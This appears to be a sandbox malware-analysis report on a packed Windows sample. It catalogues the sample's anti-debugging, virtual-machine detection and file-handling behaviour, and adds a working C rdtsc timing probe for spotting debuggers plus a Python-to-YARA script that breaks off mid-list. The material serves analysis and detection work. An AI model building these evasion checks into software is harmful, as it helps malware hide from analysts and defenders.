Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2F05C second address: C2F071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007EFD6CF3F37Ah 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C31808 second address: C3180E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3180E second address: C3182A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007EFD6CF3F376h 0x0000000c jmp 00007EFD6CF3F37Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3182A second address: C3182F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3182F second address: C31853 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 jng 00007EFD6CF3F392h 0x0000000c jmp 00007EFD6CF3F386h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C366AC second address: C366B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C366B2 second address: C366C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F37Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C4534D second address: C45351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C45351 second address: C45363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007EFD6CF3F376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C45363 second address: C45367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C45367 second address: C4536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C455F8 second address: C455FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C46600 second address: C46606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C4D3AE second address: C4D3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Dh 0x00000009 jmp 00007EFD6CDBF8A5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C4D3D6 second address: C4D3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C4D05E second address: C4D070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C574CC second address: C574D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C574D4 second address: C574D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C574D8 second address: C57504 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007EFD6CF3F388h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C57504 second address: C57514 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD6CDBF896h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C57514 second address: C57518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C57518 second address: C5751E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C5751E second address: C5752E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007EFD6CF3F376h 0x0000000a jnc 00007EFD6CF3F376h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C5DAFD second address: C5DB09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007EFD6CDBF896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C5DB09 second address: C5DB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C5DB0D second address: C5DB11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C600DE second address: C600E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFD6CF3F376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C600E8 second address: C60135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007EFD6CDBF89Ah 0x00000010 jmp 00007EFD6CDBF8A5h 0x00000015 pushad 0x00000016 jmp 00007EFD6CDBF8A5h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C5C4DB second address: C5C4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C6C19D second address: C6C1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFD6CDBF896h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C6F7EA second address: C6F7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7E5F4 second address: C7E607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7E607 second address: C7E60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7E60B second address: C7E613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7E613 second address: C7E61D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFD6CF3F376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7E61D second address: C7E621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7E745 second address: C7E753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007EFD6CF3F376h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7E753 second address: C7E764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7ECEB second address: C7ECF1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7EE34 second address: C7EE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7EE38 second address: C7EE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7EE3E second address: C7EE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7EE48 second address: C7EE4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7EE4E second address: C7EE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD6CDBF8A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C81F48 second address: C81F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C8201F second address: C82023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C82254 second address: C82258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C82258 second address: C8225C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C82494 second address: C824CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD6CF3F376h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D24D3h], ebx 0x00000015 push dword ptr [ebp+124567A5h] 0x0000001b mov dword ptr [ebp+122D285Dh], edi 0x00000021 mov edx, dword ptr [ebp+122D2A79h] 0x00000027 push B6C3C54Dh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jnc 00007EFD6CF3F376h 0x00000035 push esi 0x00000036 pop esi 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C8372F second address: C83735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C83735 second address: C8373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA0436 second address: 4EA043C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA043C second address: 4EA04A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, CFD8h 0x00000007 jmp 00007EFD6CF3F381h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007EFD6CF3F37Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007EFD6CF3F380h 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007EFD6CF3F37Eh 0x00000024 jmp 00007EFD6CF3F385h 0x00000029 popfd 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA04A3 second address: 4EA04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA0506 second address: 4EA051B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EA051B second address: 4EA058B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edx 0x0000000e call 00007EFD6CDBF8A6h 0x00000013 pop ecx 0x00000014 popad 0x00000015 jmp 00007EFD6CDBF89Bh 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007EFD6CDBF8A6h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007EFD6CDBF8A7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9EDC14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9EDC58 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BBDCB9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision graph_0-39131
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007140F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0070E530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00701710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00701710
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007147C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007147C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0070F7B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00714B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00714B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00713B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00713B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0070DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0070BE40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0070EE20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0070DF10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00701160 GetSystemInfo,ExitProcess,0_2_00701160
Source: file.exe, file.exe, 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2138292693.0000000001234000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2138292693.0000000001202000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: file.exe, 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-37947
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-37944
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-37965
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-37832
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-37958
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-37998
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
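Each "RDTSC instruction interceptor" line above records two consecutive rdtsc executions and the instructions the sandbox saw between them. The push eax / push edx ... pop edx / pop eax filler is there because rdtsc writes the counter into EDX:EAX, so those two registers have to be saved around the second read; the pushad/popad pairs, push ecx / pop ecx and never-taken conditional jumps are junk inserted by the protector (the Oreans.vxd and Software\WinLicense strings in the memory dump are consistent with a WinLicense/Themida-family packer, which is also what the "changes PE section rights" and self-modifying-code hits point to). The C program below is an added example, not code from the report or from the sample: it shows the timing check such interceptor hits correspond to, reading the counter twice around a short filler and treating a large minimum delta over several rounds as a sign that something (debugger, emulator, instrumenting sandbox) sits between the two reads. The threshold and round count are assumptions, and taking the minimum over rounds is a common refinement to avoid false positives from context switches, not something the report shows the sample doing. On non-x86 hosts a monotonic clock stands in for the counter so the program still builds.

```c
/* Added example: the rdtsc timing probe behind the interceptor hits.
 * Not code from the Joe Sandbox report or from the analysed sample. */
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
/* rdtsc returns the 64-bit timestamp counter in EDX:EAX; that is why the
 * protector's filler pushes and pops exactly EAX and EDX around it. */
static uint64_t read_tsc(void)
{
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}
#else
/* Fallback so the example builds on non-x86 hosts: a monotonic nanosecond
 * clock stands in for the cycle counter (assumption for portability only). */
#include <time.h>
static uint64_t read_tsc(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}
#endif

/* Decision logic kept pure so it can be tested with fixed inputs. */
int delta_looks_instrumented(uint64_t delta, uint64_t threshold)
{
    return delta > threshold;
}

/* One probe is exactly the window the report prints as
 * "First address ... second address": rdtsc ; <filler> ; rdtsc. */
uint64_t probe_once(void)
{
    uint64_t t0 = read_tsc();
    volatile int filler = 0;   /* stands in for the push/pop junk in the trace */
    filler++;
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Taking the minimum over several rounds discards the occasional context
 * switch; only a delta that is large on every read (the counter being
 * intercepted or the code single-stepped) survives the comparison. */
uint64_t min_probe_delta(int rounds)
{
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < rounds; i++) {
        uint64_t d = probe_once();
        if (d < best)
            best = d;
    }
    return best;
}

int main(void)
{
    const uint64_t threshold = 1000;   /* assumed value; real packers tune this */
    uint64_t d = min_probe_delta(64);
    printf("min rdtsc delta over 64 rounds: %llu -> %s\n",
           (unsigned long long)d,
           delta_looks_instrumented(d, threshold) ? "instrumented" : "native");
    return 0;
}
```

A sandbox that intercepts rdtsc, as Joe Sandbox does here, can return a controlled counter value so the delta stays small; a debugger that single-steps through the filler cannot, which is the asymmetry the check exploits.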

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00704610 VirtualProtect ?,00000004,00000100,00000000 0_2_00704610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00719BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719AA0 mov eax, dword ptr fs:[00000030h] 0_2_00719AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00717690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00717690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
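The artefacts in this section are what an analyst wants to pull out of the report: the window class names belong to OllyDbg and the Sysinternals Process/Registry/File Monitor tools, NTICE, SICE and SIWVID are the SoftICE driver device names that the classic anti-debug check tries to open, HideFromDebugger is the ThreadHideFromDebugger class of NtSetInformationThread, and DebugPort is the ProcessDebugPort class of NtQueryInformationProcess. Those strings are both hunting material (a YARA rule) and a checklist of what a sandbox image must not expose. The Python script below is an added example, not part of the Joe Sandbox report: it parses the raw signature lines (the input is copied from this report; the text export fuses the source path with the signature name and appends the "Jump to behavior" link caption, and the regex tolerates both), groups them by check type, and emits a YARA strings block from the window and device names. The rule name and the "3 of them" condition are assumptions; the BIOS and driver registry value names are deliberately kept out of the rule because benign software reads them too.

```python
"""Added example (not from the Joe Sandbox report): turn the report's raw
anti-debug / anti-VM signature lines into structured artefacts and a YARA
strings block.  The input lines below are copied from the report."""
import re
from collections import defaultdict

# The text export fuses the source path with the signature name and may
# append the "Jump to behavior" link caption; both are tolerated here.
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.*?)\s*\|?\s*"
    r"(?P<sig>RDTSC instruction interceptor|Open window title or class name"
    r"|File opened|Registry key queried|Process queried|Thread information set)"
    r"\s*:\s*(?P<detail>.*?)\s*(?:Jump to behavior)?\s*$"
)
RDTSC_RE = re.compile(r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+)")

# Copied from the report above (raw export form, path and signature fused).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: NTICE",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID",
    r"Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior",
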